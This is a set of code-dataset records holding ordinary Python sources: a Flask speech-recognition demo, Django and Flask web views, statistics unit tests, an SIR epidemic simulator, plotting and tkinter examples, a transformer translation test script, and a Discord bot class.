pygame.display.update()\r\n\r\nmain()\r\n","sub_path":"tileFactoryexperiment.py","file_name":"tileFactoryexperiment.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"184663839","text":"n = int(input(\"Enter the month: \"))\r\ndef HIEN_THI(n):\r\n if(1<=n and n<=3):\r\n print(\"Spring\")\r\n elif(4<=n and n<=6):\r\n print(\"Summer\")\r\n elif (7<=n and n<=9):\r\n print(\"Autumn\")\r\n elif(10<=n and n<=12):\r\n print(\"Winter\")\r\nHIEN_THI(n)\r\n
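# Example: HIEN_THI(4) prints \"Summer\"; HIEN_THI(11) prints \"Winter\".\r\n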
","sub_path":"BaiTap4.py","file_name":"BaiTap4.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"598905451","text":"import os\nfrom flask_cors import CORS, cross_origin\nfrom flask import Flask, request, render_template, jsonify\nfrom werkzeug.utils import secure_filename\nimport numpy as np\nimport librosa\nimport soundfile as sf\nimport ffmpeg\nimport base64\nimport uuid\nimport json\nfrom recognizer import Recognizer\n\napp = Flask(__name__)\nCORS(app)\n\nrecognizer = Recognizer(output_dir='logs',\n model_cfg='tasks/SpeechRecognition/ktelspeech/configs/jasper10x5dr_sp_offline_specaugment.yaml',\n ckpt='tasks/SpeechRecognition/ktelspeech/checkpoints/Jasper_epoch80_checkpoint.pt',\n task_path=\"tasks.SpeechRecognition.ktelspeech.local.manifest\",\n vocab=\"tasks/SpeechRecognition/ktelspeech/data/KtelSpeech/vocab\")\nrecognizer.load_model()\n\n\n@app.route('/')\ndef index():\n return render_template('index_tel_offline.html')\n\n\n@app.route('/recognize', methods=['POST'])\ndef file_upload():\n data = request.get_json()\n print(\"uid: \", data[\"uid\"])\n print(\"sid: \", data[\"sid\"])\n dec_data = base64.b64decode(data[\"data\"])\n\n os.makedirs('./logs', exist_ok=True)\n file_name = os.path.join('./logs', secure_filename(str(uuid.uuid4())))\n wav_file_name = file_name + '.wav'\n\n with open(file_name, mode='wb') as fd:\n fd.write(dec_data)\n _ = (ffmpeg.input(file_name)\n .output(wav_file_name, format='wav', acodec='pcm_s16le', ac=1, ar=16000)\n .overwrite_output()\n .global_args('-hide_banner')\n .global_args('-loglevel', 'error')\n .run())\n\n text = recognizer.transcribe(wav_file_name, option=1)\n\n os.remove(wav_file_name)\n os.remove(file_name)\n\n return jsonify({\"text\": text})\n\n\nif __name__ == \"__main__\":\n app.run(port=15005)\n","sub_path":"demo/offline_tel_demo.py","file_name":"offline_tel_demo.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"550334412","text":"# -*- coding: utf-8 -*-\n# \n# Unit tests for the Simple Statistics library\n# \n# Copyright 2020 AI Mechanics & Tech\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n#----- Imports\nimport unittest\nimport random\n\nfrom amtStats import Statistics\n\n\n#----- Globals\nRANDOM_SEED_VALUE = 1234\nRANDOM_MIN_VALUE = 1\nRANDOM_MAX_VALUE = 100\nRANDOM_ODD_VALUE = 35\nRANDOM_EVEN_VALUE = 78\n\n#----- Classes\nclass TestQuantiles(unittest.TestCase):\n\n def setUp(self):\n random.seed(RANDOM_SEED_VALUE)\n self.obj = Statistics()\n\n def test_Q1_odd(self):\n for _ in range(RANDOM_ODD_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 1)\n self.assertEqual(median, 12.0)\n\n def test_Q2_odd(self):\n for _ in range(RANDOM_ODD_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = 
self.obj._quantile(self.obj.values, 2)\n self.assertEqual(median, 45.0)\n\n def test_Q3_odd(self):\n for _ in range(RANDOM_ODD_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 3)\n self.assertEqual(median, 77.0)\n\n\n def test_Q1_even(self):\n for _ in range(RANDOM_EVEN_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 1)\n self.assertEqual(median, 12.0)\n\n def test_Q2_even(self):\n for _ in range(RANDOM_EVEN_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 2)\n self.assertEqual(median, 44.0)\n\n def test_Q3_even(self):\n for _ in range(RANDOM_EVEN_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 3)\n self.assertEqual(median, 72.0)\n\n def test_empty_values(self):\n with self.assertRaises(ValueError):\n self.obj._quantile([], 1)\n \n def test_only_one_value(self):\n self.obj.update(42)\n self.assertEqual(self.obj._quantile(self.obj.values, 1), 42)\n ","sub_path":"tests/testQuantile.py","file_name":"testQuantile.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359093936","text":"import numpy as np\nimport math\nimport scipy.stats as stats\nfrom abc import ABCMeta, abstractmethod\nimport distributions \nimport utils_math\nfrom problems import ABC_problems\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport time\n\n\nclass SIR_Problem(ABC_problems.ABC_Problem):\n\n '''\n SIR epidemic model with two parameters. Please see ICML18' - Black-box Variational Inference for Stochastic Differential Equations\n '''\n\n def __init__(self, N=100, n=50):\n\n self.N = N # number of parameter samples\n self.n = n # number of data samples in each simulation\n\n self.prior = [distributions.uniform, distributions.uniform]\n self.prior_args = np.array([[1.5, 2.4], [0.2, 0.6]])\n self.simulator_args = ['theta1', 'theta2'] # just for information\n self.K = 2 # number of parameters\n\n self.true_theta1 = 1.75\n self.true_theta2 = 0.475\n self.T = 8\n\n def get_true_theta(self):\n return np.array([self.true_theta1, self.true_theta2])\n\n def statistics(self, data, theta=None):\n # some preparation\n n_stat_per_dim = int(self.n/4)\n stat = np.zeros([1, 2*n_stat_per_dim])\n x, y = data[:, 0].copy(), data[:, 1].copy()\n\n # take (x_t, y_t) every 2 timestamps\n idx = np.linspace(1, self.n-1, n_stat_per_dim).astype(int)\n xx = x[idx]\n yy = y[idx]\n\n stat[:, 0:n_stat_per_dim] = xx\n stat[:, n_stat_per_dim:2*n_stat_per_dim] = yy\n return stat\n\n def simulator(self, theta):\n # get the params\n theta1 = theta[0]\n theta2 = theta[1]\n\n # noises\n T, d = self.T, self.n+1\n dt = T/d\n\n # data\n x = np.zeros([self.n, 2])\n x[0, 0], x[0, 1] = 100, 1\n N = x[0, 0] + x[0, 1]\n eps = distributions.normal_nd.draw_samples(mean=[0,0], cov=np.array([[1, 0], [0, 1]]), N=self.n)\n for t in range(self.n-1):\n S, I = x[t, 0], x[t, 1]\n s, i = S/N, I/N\n a, b = theta1*s*i, theta2*i\n alpha = np.array([-a, a - b])\n beta_sqrt = np.array([[a**0.5, 0], [-a**0.5, b**0.5]])\n dx = alpha*dt + (1/N**0.5)*(dt**0.5)*np.matmul(beta_sqrt, eps[t, :])\n tmp = x[t, :] + dx*N\n x[t+1, :] = np.log(np.exp(tmp)+1)\n return x/N\n\n def sample_from_prior(self):\n sample_theta1 = 
self.prior[0].draw_samples(self.prior_args[0, 0], self.prior_args[0, 1], 1)[0]\n sample_theta2 = self.prior[1].draw_samples(self.prior_args[1, 0], self.prior_args[1, 1], 1)[0]\n return np.array([sample_theta1, sample_theta2])\n \n def visualize(self):\n plt.figure()\n t = np.linspace(0, self.n, self.n).astype(int)\n plt.plot(t, self.data_obs[:, 0], '-',mfc='none', color='r', label='S')\n plt.plot(t, self.data_obs[:, 1], '-',mfc='none', color='b', label='I')\n plt.plot(t, self.data_obs[:, 0], 'o',mfc='none', color='r')\n plt.plot(t, self.data_obs[:, 1], '^',mfc='none', color='b')\n plt.xlabel('time t')\n plt.ylabel('data x')\n plt.legend()\n plt.show()","sub_path":"problems/problem_SIR.py","file_name":"problem_SIR.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"182686471","text":"\"\"\"\n==============================\nCreate 3D histogram of 2D data\n==============================\n\nDemo of a histogram for 2 dimensional data as a bar graph in 3D.\n\"\"\"\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nx, y = np.random.rand(2, 100) * 4\nhist, xedges, yedges = np.histogram2d(x, y, bins=4, range=[[0, 4], [0, 4]])\n\n# Construct arrays for the anchor positions of the 16 bars.\n# Note: np.meshgrid gives arrays in (ny, nx) so we use 'F' to flatten xpos,\n# ypos in column-major order. For numpy >= 1.7, we could instead call meshgrid\n# with indexing='ij'.\nxpos, ypos = np.meshgrid(xedges[:-1] + 0.25, yedges[:-1] + 0.25)\nxpos = xpos.flatten('F')\nypos = ypos.flatten('F')\nzpos = np.zeros_like(xpos)\n\n# Construct arrays with the dimensions for the 16 bars.\ndx = 0.5 * np.ones_like(zpos)\ndy = dx.copy()\ndz = hist.flatten()\n\nax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='b', zsort='average')\n\nplt.show()\n","sub_path":"Packages/matplotlib-2.2.2/examples/mplot3d/hist3d.py","file_name":"hist3d.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"575186482","text":"from flask import g, url_for, redirect, flash\nfrom flask import session as login_session \nfrom ... import checkAccessToken, clearLoginSession \n \nfrom . 
import mod_oauth2\nfrom .gdisconnect import gdisconnect\nfrom .fbdisconnect import fbdisconnect\n\n@mod_oauth2.route('/disconnect')\n@mod_oauth2.route('/logout')\ndef disconnect():\n\tisSessionValid = checkAccessToken()\n\tUSER = g.user\n\tif ('provider' in login_session):\n\t\tif isSessionValid:\n\t\t\tif login_session.get('provider') == 'google':\n\t\t\t\tgdisconnect()\n\t\t\tif login_session.get('provider') == 'facebook':\n\t\t\t\tfbdisconnect()\n\t\tflash(\"You have successfully been logged out.\")\n\t\treturn redirect(url_for('home.landing_page'))\n\telif USER:\n\t\tclearLoginSession()\n\t\tflash(\"You have successfully been logged out.\")\n\t\treturn redirect(url_for('home.landing_page'))\n\telse:\n\t\tclearLoginSession()\n\t\tflash(\"You were not logged in\")\n\t\treturn redirect(url_for('home.landing_page'))\n","sub_path":"app/views/mod_oauth2/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"326690736","text":"from PIL import Image\r\nfrom io import BytesIO\r\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\r\nimport sys\r\n\r\n\r\ndef rescale_image(self, img):\r\n # Opening the uploaded image\r\n size = (128, 128)\r\n im = Image.open(img)\r\n\r\n output = BytesIO()\r\n\r\n # Resize/modify the image\r\n im = im.resize((650, 350))\r\n\r\n # after modifications, save it to the output\r\n im.save(output, format='JPEG', quality=100)\r\n output.seek(0)\r\n\r\n im = InMemoryUploadedFile(output, 'ImageField', \"%s.jpg\" % self.service_image1.name.split('.')[\r\n 0], 'image/jpeg', sys.getsizeof(output), None)\r\n\r\n return im\r\n","sub_path":"website/websiteapp/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"211101170","text":"import sys\nsys.path.append(\"/home/shuyanzh/workshop/tql-transformer/\")\nimport time\nimport functools\nimport numpy as np\nimport math\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom src.utils.util_func import *\nfrom copy import deepcopy\nfrom src.data_loader import DataLoader, Batch\nfrom src.config import argps\nfrom src.train import make_model\nimport pickle\nfrom collections import defaultdict\nimport sentencepiece as spm\n\nfrom src.beam_search import beam_search_decode_step,beam_search_decode\n\nprint = functools.partial(print, flush=True)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef test_data_iter(test_file, src_suffix, trg_suffix, w2i_src, w2i_trg):\n # read data\n src_file = open(test_file + \".\" + src_suffix, \"r\", encoding=\"utf-8\")\n trg_file = open(test_file + \".\" + trg_suffix, \"r\", encoding=\"utf-8\")\n line_tot = 0\n for src_line, trg_line in zip(src_file, trg_file):\n line_tot += 1\n src_tks = src_line.strip().split()\n trg_tks = trg_line.strip().split()\n src = [w2i_src[tk] for tk in src_tks ]\n trg = [w2i_trg[tk] for tk in [\"\"] + trg_tks + [\"\"]]\n src = torch.LongTensor([src])\n trg = torch.LongTensor([trg])\n yield(Batch(src, trg))\n src_file.close()\n trg_file.close()\n print(\"[INFO] total test {:d}\".format(line_tot))\n\ndef greedy_decode(model, src, src_mask, max_len, start_symbol, end_symbol):\n memory = model.encode(src, src_mask)\n ys = torch.ones(1, 1).fill_(start_symbol).long().to(device)\n for i in range(max_len-1):\n trg_mask = generate_subseq_mask(ys.size(1)).to(device)\n out = model.decode(memory, ys,\n src_mask, trg_mask)\n prob = 
model.projector(out[:, -1])\n _, next_word = torch.max(prob, dim = 1)\n next_word = next_word.item()\n next_word_ys = torch.ones(1, 1).fill_(next_word).long().to(device)\n ys = torch.cat([ys, next_word_ys], dim=1)\n if next_word == end_symbol:\n break\n return ys\n\ndef load_sp_model(model_path):\n sp = spm.SentencePieceProcessor()\n sp.Load(model_path)\n return sp\n\ndef test(args):\n max_len = args.max_len\n w2i_src_file = args.w2i_map_file + \"_src.pkl\"\n w2i_trg_file = args.w2i_map_file + \"_trg.pkl\"\n with open(w2i_src_file, \"rb\") as f:\n w2i_src = pickle.load(f)\n src_vocab_size = len(w2i_src)\n print(\"[INFO] source vocab size: {:d}\".format(src_vocab_size))\n with open(w2i_trg_file, \"rb\") as f:\n w2i_trg = pickle.load(f)\n trg_vocab_size = len(w2i_trg)\n i2w_trg = {v: str(k) for k, v in w2i_trg.items()}\n print(\"[INFO] target vocab size: {:d}\".format(trg_vocab_size))\n\n w2i_src = defaultdict(lambda: w2i_src[\"\"], w2i_src)\n w2i_trg = defaultdict(lambda: w2i_trg[\"\"], w2i_trg)\n\n # load model\n model_info = torch.load(args.model_path + \"_\" + str(args.model_ckpt) + \".tar\")\n transformer = make_model(src_vocab_size, trg_vocab_size)\n transformer.load_state_dict(model_info[\"model_state_dict\"])\n transformer.to(device)\n print(\"[INFO] reload model from {}\".format(args.model_path + \"_\" + str(args.model_ckpt) + \".tar\"))\n\n # load sentence piece model\n sp = load_sp_model(args.sp_model_path)\n\n # write result here\n with open(args.result_file, \"w+\", encoding=\"utf-8\") as f:\n data_iter = test_data_iter(args.test_file, args.src_suffix, args.trg_suffix, w2i_src, w2i_trg)\n for idx, cur_sample in enumerate(data_iter):\n # decoded = greedy_decode(transformer, cur_sample.src, cur_sample.src_mask,\n # max_len, start_symbol=w2i_trg[\"\"], end_symbol=w2i_trg[\"\"])\n decoded = beam_search_decode(beam_search_decode_step,transformer, cur_sample.src, cur_sample.src_mask,\n max_len, start_symbol=w2i_trg[\"\"], end_symbol=w2i_trg[\"\"],beam_size=5)\n\n decoded_str = list(decoded.cpu().numpy()[0])\n decoded_str = [i2w_trg[x] for x in decoded_str]\n # remove \n decoded_str = decoded_str[1:]\n # remove \n if decoded_str[-1] == \"\":\n decoded_str = decoded_str[:-1]\n decoded_str = sp.DecodePieces(decoded_str)\n f.write(decoded_str + \"\\n\")\n if (idx + 1) % 1000 == 0:\n print(idx)\n\n\nif __name__ == \"__main__\":\n args = argps()\n test(args)\n\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"455479367","text":"from django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import ListView, DetailView, TemplateView\nfrom photos.models import Photo, PhotoSet\n\n\nPHOTOS_PER_PAGE = 24\n\n\nclass NavigationMixin(object):\n def get_context_data(self, **kwargs):\n ctx = super(NavigationMixin, self).get_context_data(**kwargs)\n if not ctx:\n ctx = {}\n\n sets = settings.PHOTOSETS\n psets = PhotoSet.objects.filter(flickr_id__in=[s[0] for s in sets])\n # Keep order\n pset_dict = dict([(s.flickr_id, s) for s in psets])\n ctx['sets'] = [pset_dict[int(flickr_id)] for flickr_id, title in sets]\n return ctx\n\n\n#\n# VIEWS\n#\nclass PhotoListBase(ListView):\n model = Photo\n paginate_by = PHOTOS_PER_PAGE\n\n def get_queryset(self):\n self.photo_set = self.kwargs.get(\"photo_set\", \"\")\n pset = get_object_or_404(PhotoSet, slug=self.photo_set)\n return 
Photo.objects.filter(\n photo_order__photo_set=pset).order_by(\"photo_order__order\")\n\n\nclass PhotoListSnippet(PhotoListBase):\n template_name = \"pages/components/photo_list.html\"\n\n def get_context_data(self, **kwargs):\n ctx = super(PhotoListSnippet, self).get_context_data(**kwargs)\n ctx['page'] = ctx['page_obj']\n ctx['photos'] = ctx['object_list']\n return ctx\n\n\nclass PhotoListView(NavigationMixin, PhotoListBase):\n template_name = \"pages/photos.html\"\n\n def get_context_data(self, **kwargs):\n ctx = super(PhotoListView, self).get_context_data(**kwargs)\n ctx['photoset_slug'] = self.photo_set\n return ctx\n\n\nclass PhotoDetailView(DetailView):\n model = Photo\n template_name = \"pages/photo.html\"\n\n def get_object(self):\n flickr_id = self.kwargs.get(\"flickr_id\")\n return get_object_or_404(self.model, flickr_id=flickr_id)\n\n def get_back_url(self):\n order_obj = self.object.photo_order\n url = reverse('photo_list', args=(order_obj.photo_set.slug,))\n # Add page parameter if not on first page (integer division keeps the page number whole)\n if order_obj.order > PHOTOS_PER_PAGE:\n url += \"?page=\" + str(((order_obj.order - 1) // PHOTOS_PER_PAGE) + 1)\n return url\n\n def get_photo_url(self):\n widths = (400, 633, 950, 1270, 1900, 2530)\n viewport_size = self.request.viewport_size\n\n width = widths[0]\n for w in widths:\n if w < viewport_size['width']:\n width = w\n else:\n break\n height = viewport_size['height']\n return self.object.get_boxed(width, height)\n\n def get_context_data(self, **kwargs):\n ctx = super(PhotoDetailView, self).get_context_data(**kwargs)\n if not ctx:\n ctx = {}\n ctx['back_url'] = self.get_back_url()\n ctx['photo_url'] = self.get_photo_url()\n return ctx\n\n\nclass Homepage(NavigationMixin, TemplateView):\n template_name = \"pages/homepage.html\"\n","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"507354419","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Entry Boxes\")\nroot.geometry('700x500')\n\nmy_label = Label(root, text = \"Enter the number of different frames : \")\nmy_label.grid(row = 0 , column = 0 , padx =5, pady = 20)\n# keep the widget reference before calling .grid(), which returns None;\n# chaining them would leave my_frame_entry as None and break .get() below\nmy_frame_entry = Entry(root, width = 50 , bd = 3)\nmy_frame_entry.grid(row = 0,column = 1)\n\n\ndef multiple_frames():\n new_label = Label(root, text = my_frame_entry.get())\n new_label.grid(row =4, column = 4)\n\n \nmy_confirm_button = Button(root, text = \"Confirm\", command = multiple_frames, bd = 3).grid(row = 1, column = 0, pady = 10 , padx = 5)\n\n\nroot.mainloop()","sub_path":"multippleEntry.py","file_name":"multippleEntry.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"117933647","text":"from .channel.mainchannel import MainBotChannel\nfrom .channel.pmbotchannel import PMBotChannel\nfrom .daily.dailymanager import DailyManager\nfrom .necrodb import NecroDB\nfrom .prefs.prefsmanager import PrefsManager\nfrom .race.racemanager import RaceManager\nfrom .util import console\nfrom .util.config import Config\n\n\nclass Necrobot(object):\n # Barebones constructor\n # client: [discord.Client] \n # logger: [logging.Logger]\n def __init__(self, client):\n self.client = client # the discord.Client object\n self.server = None # the discord.Server on which to read commands\n\n self._main_discord_channel = None # discord.Channel\n\n self._bot_channels = {} # maps discord.Channels onto BotChannels\n self._pm_bot_channel = None\n\n 
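# Subsystem managers; post_login_init constructs these once the client has logged in.\n 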
self._daily_manager = None\n self._race_manager = None\n self._prefs_manager = None\n\n self._initted = False\n self._quitting = False\n\n # Initializes object; call after client has been logged in to discord\n # server_id: [int]\n def post_login_init(self, server_id):\n console.info('-Logged in---------------')\n console.info('User name: {0}'.format(self.client.user.name))\n console.info('User id : {0}'.format(self.client.user.id))\n\n # set up server\n try:\n int(server_id)\n id_is_int = True\n except ValueError:\n id_is_int = False\n\n if self.client.servers:\n for s in self.client.servers:\n if id_is_int and s.id == server_id:\n console.info(\"Server id: {}\".format(s.id))\n self.server = s\n elif s.name == server_id:\n console.info(\"Server id: {}\".format(s.id))\n self.server = s\n else:\n console.error('Could not find the server.')\n exit(1)\n\n console.info('-------------------------')\n console.info(' ')\n\n self._main_discord_channel = self.find_channel(Config.MAIN_CHANNEL_NAME)\n if self._main_discord_channel is None:\n console.error('Could not find the \"{0}\" channel.'.format(Config.MAIN_CHANNEL_NAME))\n exit(1)\n\n if not self._initted:\n # Create new data\n self.register_bot_channel(self._main_discord_channel, MainBotChannel(self))\n self._pm_bot_channel = PMBotChannel(self)\n self._daily_manager = DailyManager(self)\n self._race_manager = RaceManager(self)\n self._prefs_manager = PrefsManager(self)\n self._initted = True\n else:\n self.refresh()\n\n def refresh(self):\n channel_pairs = {}\n for channel, bot_channel in self._bot_channels.items():\n new_channel = self.find_channel_with_id(channel.id)\n if new_channel is not None:\n channel_pairs[new_channel] = bot_channel\n bot_channel.refresh(new_channel)\n self._bot_channels = channel_pairs\n\n if self._daily_manager is not None:\n self._daily_manager.refresh()\n if self._race_manager is not None:\n self._race_manager.refresh()\n if self._prefs_manager is not None:\n self._prefs_manager.refresh()\n\n def cleanup(self):\n if self._daily_manager is not None:\n self._daily_manager.close()\n if self._race_manager is not None:\n self._race_manager.close()\n if self._prefs_manager is not None:\n self._prefs_manager.close()\n self._bot_channels.clear()\n\n # Returns the BotChannel corresponding to the given discord.Channel, if one exists\n # discord_channel: [discord.Channel]\n def get_bot_channel(self, discord_channel):\n if discord_channel.is_private:\n return self._pm_bot_channel\n else:\n return self._bot_channels[discord_channel]\n\n # Registers the given BotChannel to handle the given discord.Channel\n # Doesn't check for duplicates\n # discord_channel: [discord.Channel]; bot_channel: [BotChannel]\n def register_bot_channel(self, discord_channel, bot_channel):\n self._bot_channels[discord_channel] = bot_channel\n\n def unregister_bot_channel(self, discord_channel):\n del self._bot_channels[discord_channel]\n\n # True if the bot wants to quit (i.e. 
if logout() has been called)\n @property\n def quitting(self):\n return self._quitting\n\n # Return the #necrobot_main channel\n # return: [discord.Channel]\n @property\n def main_channel(self):\n return self._main_discord_channel\n\n # Get a list of all admin roles on the server\n # return: [list]\n @property\n def admin_roles(self):\n admin_roles = []\n for rolename in Config.ADMIN_ROLE_NAMES:\n for role in self.server.roles:\n if role.name == rolename:\n admin_roles.append(role)\n return admin_roles\n\n @property\n def race_manager(self):\n return self._race_manager\n\n @property\n def daily_manager(self):\n return self._daily_manager\n\n @property\n def prefs_manager(self):\n return self._prefs_manager\n\n # Returns true if the user is a server admin\n # user: [discord.User]\n # return: [bool]\n def is_admin(self, user):\n member = self.get_as_member(user)\n admin_roles = self.admin_roles\n for role in member.roles:\n if role in admin_roles:\n return True\n return False\n\n # Returns the channel with the given name on the server, if any\n # channel_name: [string]\n # return: [discord.Channel]\n def find_channel(self, channel_name):\n for channel in self.server.channels:\n if channel.name == channel_name:\n return channel\n return None\n\n # Returns the channel with the given id on the server, if any\n # channel_id: [int]\n # return: [discord.Channel]\n def find_channel_with_id(self, channel_id):\n for channel in self.server.channels:\n if int(channel.id) == int(channel_id):\n return channel\n return None\n\n # Returns the first member with a given username (capitalization ignored)\n # username: [string]\n # return: [discord.Member]\n def find_member(self, username):\n for member in self.server.members:\n if member.display_name.lower() == username.lower():\n return member\n\n # Returns a list of all members with a given username (capitalization ignored)\n # username: [string]\n # return: [list]\n def find_members(self, username):\n to_return = []\n for member in self.server.members:\n if member.display_name.lower() == username.lower():\n to_return.append(member)\n return to_return\n\n # Returns the given Discord user as a member of the server\n # user: [discord.User]\n # return: [discord.Member]\n def get_as_member(self, user):\n for member in self.server.members:\n if int(member.id) == int(user.id):\n return member\n\n # Registers all users currently on the server\n def register_all_users(self):\n NecroDB().register_all_users(self.server.members)\n\n # Registers a specific user on the server\n # member: [discord.Member]\n @staticmethod\n def register_user(member):\n NecroDB().register_all_users([member])\n\n# Coroutines--------------------\n # Log out of discord\n async def logout(self):\n self._quitting = True\n await self.client.logout()\n\n # Log out of discord, but do not set quitting flag\n async def reboot(self):\n await self.client.logout()\n\n # Call this when anyone joins the server\n async def on_member_join(self, member):\n self.register_user(member)\n \n # Executes a command\n # cmd: [command.Command]\n async def execute(self, cmd):\n # don't care about bad commands\n if cmd.command is None:\n return\n\n # don't reply to self\n if cmd.author == self.client.user:\n return\n\n # handle the command with the appropriate bot channel\n if cmd.is_private:\n await self._pm_bot_channel.execute(cmd)\n elif cmd.channel in self._bot_channels:\n await 
self._bot_channels[cmd.channel].execute(cmd)\n","sub_path":"necrobot/necrobot.py","file_name":"necrobot.py","file_ext":"py","file_size_in_byte":8354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"398450899","text":"#!/usr/bin/env python\n\n'''\nCreated by Samvel Khalatyan, Feb 28, 2012\nCopyright 2011, All rights reserved\n'''\n\nfrom channel_template import ChannelTemplate, MCChannelTemplate\nfrom channel_type import ChannelType\nfrom input_template import InputTemplate\nfrom input_type import InputType\nfrom root.template import TemplateLoader\nfrom root.error import StatError\n\nfrom util.timer import Timer\n\nclass InputTemplateLoader(InputType, TemplateLoader):\n def __init__(self, input_type):\n InputType.__init__(self, input_type)\n TemplateLoader.__init__(self)\n\n self.templates = {}\n\n self.use_folders = []\n self.ban_folders = []\n\n self.use_plots = []\n self.ban_plots = []\n\n @Timer(label = \"[load templates from file]\", verbose = True)\n def load(self, filename):\n self.templates = {}\n\n TemplateLoader.load(self, filename)\n\n def process_plot(self, template):\n if ((self.use_plots\n and template.name in self.use_plots\n and template.name not in self.ban_plots)\n\n or (not self.use_plots and template.name not in self.ban_plots)):\n\n self.templates[template.path + '/' +\n template.name] = InputTemplate(self.type, template)\n\n def process_folder(self, folder, path):\n if ((self.use_folders\n and path in self.use_folders\n and path not in self.ban_folders)\n\n or (not self.use_folders and path not in self.ban_folders)):\n\n self.load_plots(folder, path)\n\n\n\nclass ChannelTemplateLoader(object):\n def __init__(self, filename, error=21):\n self.__plots = {}\n self.__filename = filename\n\n self.use_folders = []\n self.use_plots = []\n\n ChannelTemplate.hist.set_percent(error)\n\n @property\n def plots(self):\n return self.__plots\n\n def load(self, channel_types):\n self.__plots = {}\n\n for channel_type in channel_types:\n channel_plots = self.load_channel(channel_type)\n\n for name, channel in channel_plots.items():\n channels = self.plots.get(name)\n if not channels:\n channels = {}\n self.plots[name] = channels\n\n if channel.type in channels:\n raise RuntimeError(\"channel {0} is already loaded\".format(channel.type))\n\n channels[channel.type] = channel\n\n # all the channels are loaded, combine MC\n for plot, channels in self.plots.items():\n if \"mc\" in channels:\n raise RuntimeError((\"Monte-Carlo combined is already present \"\n \"for plot {0}\").format(plot))\n\n mc = MCChannelTemplate(\"mc\")\n for channel_type in set(channels.keys()) & set(mc.allowed_inputs):\n mc.add(channels[channel_type])\n\n if len(mc.input_templates):\n channels[mc.type] = mc\n\n def load_channel(self, channel_type):\n channel_plots = {}\n\n for input_type in ChannelType(channel_type).allowed_inputs:\n templates = self.load_input(input_type)\n\n # merge loaded templates into channels\n for name, template in templates.items():\n channel = channel_plots.get(name)\n if not channel:\n channel = ChannelTemplate(channel_type)\n channel_plots[name] = channel\n\n channel.add(template)\n\n return channel_plots\n\n def load_input(self, input_type):\n loader = InputTemplateLoader(input_type)\n loader.use_folders.extend(self.use_folders)\n loader.use_plots.extend(self.use_plots)\n loader.load(\"{0}/{1}\".format(loader.type, self.__filename))\n\n return loader.templates\n\n def __str__(self):\n result = []\n for k, channels in self.plots.items():\n 
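# emits one dash-padded header line per plot, then one \"type: [input types]\" line per channel\n 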
